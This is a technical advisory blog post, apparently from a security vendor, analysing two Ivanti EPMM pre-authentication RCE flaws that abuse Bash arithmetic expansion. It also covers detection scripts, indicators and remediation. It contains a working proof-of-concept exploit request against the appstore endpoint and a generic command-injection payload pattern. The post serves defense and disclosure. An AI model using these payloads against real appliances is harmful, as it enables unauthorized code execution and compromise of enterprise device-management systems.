
CVE-2026-1281 & CVE-2026-1340 Technical Deep Dive
Published: February 2, 2026
Executive Summary
January 2026 brought yet another critical blow to Ivanti customers. Two pre-authentication remote code execution vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM) have been actively exploited in the wild as zero-days. Both vulnerabilities carry a CVSS score of 9.8 and allow unauthenticated attackers to achieve complete system compromise through a fascinating—and frankly terrifying—abuse of Bash's arithmetic expansion feature.
This post breaks down the technical details, exploitation mechanics, detection strategies, and remediation guidance that security teams need to know.
Background: What is Ivanti EPMM?
Ivanti Endpoint Manager Mobile (formerly MobileIron Core) is an enterprise mobility management (MDM/UEM) platform used to manage, secure, and enforce policies on mobile devices across iOS, Android, and other endpoints. It's deployed by large organizations worldwide to control corporate mobile fleets, distribute applications, and protect access to enterprise resources.
Given its privileged position in enterprise networks—often with access to sensitive device data, authentication systems, and internal resources—EPMM represents a high-value target for threat actors. This isn't EPMM's first rodeo with zero-days either: the platform was exploited via CVE-2023-35078 in 2023 and through CVE-2025-4427/CVE-2025-4428 in 2025.
The Vulnerabilities
CVE-2026-1281
- Type: Code Injection (Pre-Authentication RCE)
- CVSS Score: 9.8 (Critical)
- Affected Component: In-House Application Distribution feature
- Status: Actively exploited in the wild, added to CISA KEV
CVE-2026-1340
- Type: Code Injection (Pre-Authentication RCE)
- CVSS Score: 9.8 (Critical)
- Affected Component: Android File Transfer Configuration feature
- Status: Actively exploited in the wild
Both vulnerabilities affect on-premises EPMM installations. Cloud-hosted Ivanti Neurons for MDM, Ivanti Endpoint Manager (EPM), and Ivanti Sentry are not affected.
Technical Analysis: The Root Cause
Both vulnerabilities live in Bash scripts that map request URLs for the application store and Android file transfer features. Apache starts these scripts as RewriteMap programs (the prg: map type) and, for each matching request, writes a lookup key built from the request to the script's standard input and reads the rewritten URL back from its standard output.
The Vulnerable Architecture
EPMM's Apache configuration defines two RewriteMap instances:
RewriteMap mapAppStoreURL prg:/mi/bin/map-appstore-url
RewriteMap mapAftStoreURL prg:/mi/bin/map-aft-store-url
When a client requests one of the application store endpoints, the rewrite rule concatenates pieces of the request into that lookup key without any sanitization. For example, a request to:
/mifs/c/appstore/fob/3/<int>/sha256:<params>/<filename>.ipa
Results in the following input being passed to the map-appstore-url script:
<params>_<int>_<filename>_.ipa_<HostHeader>_<EndpointPath>
The Bash Arithmetic Expansion Trap
Here's where things get interesting. The Bash script parses key-value pairs from the URL parameters:
if [[ -z ${ret} ]] ; then
    for theKeyMapEntry in "${theAppStoreKeyValueArray[@]}" ; do
        theKey="${theKeyMapEntry%%=*}"
        theValue="${theKeyMapEntry##*=}"
        logDebug "${FUNCNAME}" "theKey=$theKey; theValue=$theValue"
        case ${theKey} in
            kid)
                gKeyIndex="${theValue}"
                ;;
            st)
                gStartTime="${theValue}"
                if (( ${#gStartTime} != "${kValidTimeStampLength}" )) ; then
                    ret="${kTimestampLengthInvalidErrorCode}"
                fi
                ;;
            et)
                gEndTime="${theValue}"
                if (( ${#gEndTime} != "${kValidTimeStampLength}" )) ; then
                    ret="${kTimestampLengthInvalidErrorCode}"
                fi
                ;;
            h)
                gHashPrefixString="${theValue}"
                ;;
            *)
                ret="${kURLStructureInvalidErrorCode}"
                logDenial "${FUNCNAME}" "${ret}" "unknown presented key=${theKey}; theValue=${theValue}"
                ;;
        esac
    done
fi
The variable gPath is defined earlier in the script as an empty string:
gPath=""
Later in the script, gStartTime is used in a numeric comparison inside [[ ]], and [[ evaluates both operands of -gt as arithmetic expressions:
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]] ; then
Arithmetic Expansion + Command Substitution = RCE
Bash evaluates arithmetic expressions in (( )), $(( )), and the -eq/-gt family of comparisons inside [[ ]]. Two properties of that evaluation combine here. First, a bare word in an arithmetic context is treated as a variable name, and the variable's value is itself evaluated as an arithmetic expression, recursively. Second, if a value has the shape of an array element reference, var[index], Bash expands the index before looking up the element, and that expansion includes any command substitution the index contains. Critically, the command runs regardless of whether the comparison itself ever succeeds.
The exploit chains two parameters with one quirk of the parsing loop:
- st=theValue followed by two spaces. The only check on st is that it is exactly kValidTimeStampLength (10) characters long, and "theValue" plus two spaces is 10 characters, so it passes.
- h=gPath[`command`], where gPath is an existing variable in the script. The h key is stored in gHashPrefixString without any validation.
Processing order matters: the loop handles the entries in the order they appear (kid, st, et, h) and reuses the same loop variable, theValue, on every iteration. When the loop finishes, theValue still holds the last value assigned to it, which is the payload from h.
When the arithmetic comparison executes:
- Bash evaluates ${gStartTime} as an arithmetic expression and finds the word theValue (the trailing spaces are ignored).
- Arithmetic evaluation resolves theValue as a variable and evaluates its contents in turn.
- Those contents, gPath[`command`], parse as an array element reference.
- Bash expands the index before reading the element.
- The embedded command substitution runs on the appliance.
Proof of Concept
A minimal PoC demonstrating command execution:
GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20>%20/mi/poc%60%5D
Host: target.example.com
URL-decoded:
h=gPath[`id > /mi/poc`]
This writes the output of the id command to /mi/poc on the target system.
Why This Vulnerability Class is Underappreciated
Bash arithmetic expansion vulnerabilities have been known since at least 2014 but are still frequently overlooked in security reviews.
Arithmetic contexts include:
$((expression))
((expression))
let expression
declare -i var=expression
${var:offset:length}
${var[index]}
var[index]=value
[[ $var -eq $other ]]
Note that the single-bracket form, [ $var -eq $other ], is not an arithmetic context: test requires both operands to be plain integers and rejects anything else rather than evaluating it.
Dangerous pattern:
user_input='x[`whoami`]'
if (( user_input == 0 )); then
    echo "zero"
fi
whoami runs as a side effect of evaluating the operand, before any numeric comparison takes place; whether the comparison then succeeds or fails is irrelevant to the attacker.
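The chain described in the analysis section and the generic pattern above, as an added example that is not code from this page, from Ivanti or from watchTowr: a reduced Bash model of the parsing loop, run under bash from Python so the side effect of the injection is observable, beside a hardened version that validates every value against a strict pattern before anything arithmetic sees it. The payload echoes a marker to stderr instead of writing /mi/poc, the value formats enforced by the hardened model (ten digits, hex, small integer) are assumptions rather than EPMM's real formats, and bash must be on PATH.

```python
"""Vulnerable-vs-hardened model of the EPMM URL-mapper loop (added example)."""
import subprocess

# Constructed inputs in the shape the page describes. The payload echoes a marker
# to stderr instead of touching the filesystem; $(...) is used instead of the
# page's backticks, both are command substitution.
PAYLOAD = "kid=1,st=theValue  ,et=1337133713,h=gPath[$(echo INJECTED >&2)]"
BENIGN = "kid=1,st=1700000000,et=1700003600,h=deadbeef"

# Reduced model of the vulnerable mapper: a length check is the only validation,
# the loop variable is reused, and gStartTime reaches an arithmetic comparison.
VULNERABLE = r'''
kValidTimeStampLength=10
gPath=""                 # the existing variable the payload names
gStartTime=""; ret=""
IFS=',' read -r -a entries <<< "$1"
for theKeyMapEntry in "${entries[@]}"; do
    theKey="${theKeyMapEntry%%=*}"
    theValue="${theKeyMapEntry##*=}"      # reused: holds the h value after the loop
    case ${theKey} in
        kid) gKeyIndex="${theValue}" ;;
        st)  gStartTime="${theValue}"
             (( ${#gStartTime} != kValidTimeStampLength )) && ret=1 ;;
        et)  gEndTime="${theValue}"
             (( ${#gEndTime} != kValidTimeStampLength )) && ret=1 ;;
        h)   gHashPrefixString="${theValue}" ;;    # stored, never validated
        *)   ret=2 ;;
    esac
done
[[ -n $ret ]] && { echo denied; exit 0; }
theCurrentTimeSeconds=$(date +%s)
# -gt inside [[ ]] evaluates both sides arithmetically: "theValue  " -> the
# variable theValue -> gPath[$(...)] -> the subscript is expanded, running the command.
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then echo ok; else echo not-yet-valid; fi
'''

# Hardened model: each value must match an allow-list regex (assumed formats)
# before it is stored; unknown keys and missing st abort before any arithmetic.
HARDENED = r'''
gPath=""
gStartTime=""; ret=""
ts_re='^[0-9]{10}$'; hex_re='^[0-9a-f]{1,64}$'; int_re='^[0-9]{1,9}$'
IFS=',' read -r -a entries <<< "$1"
for theKeyMapEntry in "${entries[@]}"; do
    theKey="${theKeyMapEntry%%=*}"
    theValue="${theKeyMapEntry##*=}"
    case ${theKey} in
        kid) if [[ $theValue =~ $int_re ]]; then gKeyIndex=$theValue; else ret=1; fi ;;
        st)  if [[ $theValue =~ $ts_re ]];  then gStartTime=$theValue; else ret=1; fi ;;
        et)  if [[ $theValue =~ $ts_re ]];  then gEndTime=$theValue; else ret=1; fi ;;
        h)   if [[ $theValue =~ $hex_re ]]; then gHashPrefixString=$theValue; else ret=1; fi ;;
        *)   ret=2 ;;
    esac
    [[ -n $ret ]] && break
done
[[ -n $ret || -z $gStartTime ]] && { echo denied; exit 0; }
theCurrentTimeSeconds=$(date +%s)
# Safe: gStartTime is guaranteed to be ten ASCII digits, so nothing is re-evaluated.
if [[ $theCurrentTimeSeconds -gt $gStartTime ]]; then echo ok; else echo not-yet-valid; fi
'''


def run_mapper(script: str, params: str) -> "tuple[str, str]":
    """Run one mapper model under bash with PARAMS as $1; return (stdout, stderr)."""
    proc = subprocess.run(["bash", "-c", script, "mapper", params],
                          capture_output=True, text=True, timeout=10)
    return proc.stdout.strip(), proc.stderr


def injection_fired(stderr: str) -> bool:
    """True if the payload's command substitution actually executed."""
    return "INJECTED" in stderr


if __name__ == "__main__":
    for name, script in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        for label, params in (("benign", BENIGN), ("payload", PAYLOAD)):
            out, err = run_mapper(script, params)
            print(f"{name:10} {label:8} -> {out!r:16} command ran: {injection_fired(err)}")
```

The point the hardened model makes is that the original length check was not the bug: ${#gStartTime} always yields a number, so the check itself is safe, but a length constraint says nothing about content. The fix is to decide what each field may contain (digits, hex) and reject everything else before the value reaches any arithmetic context; regex matching with =~ does not evaluate its operand, so it is safe to apply to hostile input.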
Impact Assessment
Successful exploitation grants attackers:
- Full system access
- Administrator credential exposure
- User and device data access
- Phone numbers and identifiers
- GPS and location data (if enabled)
- MDM policy modification capability
- Authentication configuration control
- Lateral movement opportunities via Ivanti Sentry
Detection and Threat Hunting
Log Analysis
Search Apache HTTPD access logs using Ivanti’s recommended regex:
^(?!127\.0\.0\.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404
Indicators:
- Requests to /mifs/c/appstore/fob/ or /mifs/c/aftstore/fob/
- HTTP 404 responses from these endpoints
- Bash metacharacters in parameters
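The hunt described above, as an added example that is not Ivanti's or this page's code: the vendor regex applied to constructed sample lines, followed by a field-level parse that checks the actual status code and URL-decodes the path to look for Bash metacharacters. The log format (a client:port prefix followed by combined format, which is the shape the regex's 127.0.0.1:<port> exclusion implies) and every sample line are constructed, not captured traffic.

```python
"""Triage of EPMM Apache access-log lines for fob-endpoint abuse (added example)."""
import re
from urllib.parse import unquote

# Ivanti's published triage regex, exactly as quoted on the page.
IVANTI_RE = re.compile(r"^(?!127\.0\.0\.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404")

# Constructed sample lines (not real traffic). Line 1 carries the page's PoC
# payload URL-encoded; line 3 has status 200 but a 404-byte response size.
SAMPLE_LOG = """\
203.0.113.7:51522 - - [30/Jan/2026:10:15:01 +0000] "GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/app.ipa HTTP/1.1" 404 1234 "-" "curl/8.5.0"
127.0.0.1:40020 - - [30/Jan/2026:10:15:02 +0000] "GET /mifs/c/appstore/fob/3/5/sha256:kid=1/app.ipa HTTP/1.1" 404 1234 "-" "internal-healthcheck"
198.51.100.9:44012 - - [30/Jan/2026:10:16:10 +0000] "GET /mifs/c/aftstore/fob/1/2/sha256:kid=2,st=1700000000,et=1700003600,h=ab12/cfg.bin HTTP/1.1" 200 404 "-" "Mozilla/5.0"
198.51.100.9:44013 - - [30/Jan/2026:10:16:11 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.5:50001 - - [30/Jan/2026:10:17:00 +0000] "GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=1700000000,et=1700003600,h=ab12/app.ipa HTTP/1.1" 404 1234 "-" "MobileIron/12.7"
"""

# Field-level parse of a combined-format line carrying a client:port prefix.
LINE_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
FOB_RE = re.compile(r"^/mifs/c/(aft|app)store/fob/")
# Bash metacharacters that never belong in the key=value parameters of these URLs.
SHELL_META = ("`", "$(", "[", "]")


def ivanti_hits(lines):
    """Lines the vendor regex flags. Loose on purpose: '.*?404' also matches a
    404-byte response size or a '404' inside a User-Agent."""
    return [line for line in lines if IVANTI_RE.search(line)]


def strict_hits(lines):
    """Parse each line; keep non-loopback requests to the fob endpoints whose
    status field is 404, and mark those whose decoded path carries shell syntax."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["client"].startswith("127.0.0.1:") or m["status"] != "404":
            continue
        if not FOB_RE.match(m["path"]):
            continue
        decoded = unquote(m["path"])      # payloads arrive percent-encoded
        hits.append({"client": m["client"], "time": m["time"], "path": decoded,
                     "shell_meta": any(tok in decoded for tok in SHELL_META)})
    return hits


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print(f"vendor regex: {len(ivanti_hits(lines))} hits, strict: {len(strict_hits(lines))}")
    for hit in strict_hits(lines):
        tag = "SUSPICIOUS" if hit["shell_meta"] else "review    "
        print(tag, hit["client"], hit["path"])
```

Treat the vendor regex as the first pass and confirm on the parsed status field, as the third sample line shows. The metacharacter flag separates an obvious exploit attempt from an expired or malformed but ordinary download link, but its absence does not clear a hit: attackers may have used payloads that differ from the public PoC, and a 404 from these endpoints on an exposed appliance still deserves a look at the surrounding requests from the same client.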
Web Shell Detection
Look for:
- Modified JSP error pages (especially 401.jsp)
- POST requests to error pages
- Unexpected parameters
- Unknown WAR or JAR files
- Known web shells such as Behinder
Network Indicators
- Outbound connections from EPMM appliances
- Long-running sessions to external IPs
- Reverse shell behavior
Important: Attackers may clear local logs. Use centralized logging.
Affected Versions and Remediation
Affected Versions
- 12.5.0.x
- 12.5.1.0
- 12.6.0.x
- 12.6.1.0
- 12.7.0.x
Temporary Patches (RPM Scripts)
- RPM 12.x.0.x → 12.5.0.x / 12.6.0.x / 12.7.0.x
- RPM 12.x.1.x → 12.5.1.0 / 12.6.1.0
These RPMs do not persist across upgrades and must be reapplied after upgrading to another affected version.
Permanent Fix
Version 12.8.0.0 (expected Q1 2026).
The fix replaces the Bash scripts behind the RewriteMap directives with Java classes, removing the shell from the request path entirely:
# Before patch
RewriteMap mapAppStoreURL prg:/mi/bin/map-appstore-url
# After patch
RewriteMap mapAppStoreURL "prg:/bin/java -cp /mi/bin AppStoreUrlMapper"
Incident Response Guidance
Treat exposed systems as potentially compromised:
- Assume compromise if internet-exposed
- Rebuild or restore from known-good image
- Review Ivanti Sentry connections
- Audit authentication configs
- Hunt for persistence
- Check for unexpected users and shells
CISA Requirements
CISA added CVE-2026-1281 to KEV with a short remediation deadline of February 1, 2026.
Federal agencies must mitigate or discontinue vulnerable systems under BOD 22-01.
Key Takeaways for Security Teams
- Patch immediately
- Assume breach for exposed systems
- Monitor attack patterns
- Track internet-facing EPMM assets
- Audit Bash scripts for arithmetic expansion risk
Timeline
Pre-Jan 29, 2026 — Active exploitation
Jan 29, 2026 — Ivanti disclosure
Jan 29, 2026 — Added to CISA KEV
Jan 30, 2026 — Public PoC
Feb 1, 2026 — CISA deadline
Q1 2026 — Permanent fix expected
References
- Ivanti Security Advisory
- watchTowr Labs Technical Analysis
- CISA KEV Catalog Entry
- Rapid7 Analysis
- BleepingComputer Coverage
- Expel Security Alert
- The Register Analysis
- NCC Group — Shell Arithmetic Expansion Abuse
- NHS England Digital Advisory
- Orange Cyberdefense Advisory
About Hadrian
At Hadrian, we continuously monitor for emerging threats like these Ivanti vulnerabilities across our customers' attack surfaces. Our autonomous security platform identifies exposed assets and prioritizes risks in real-time, helping organizations respond to zero-days before they become breaches.


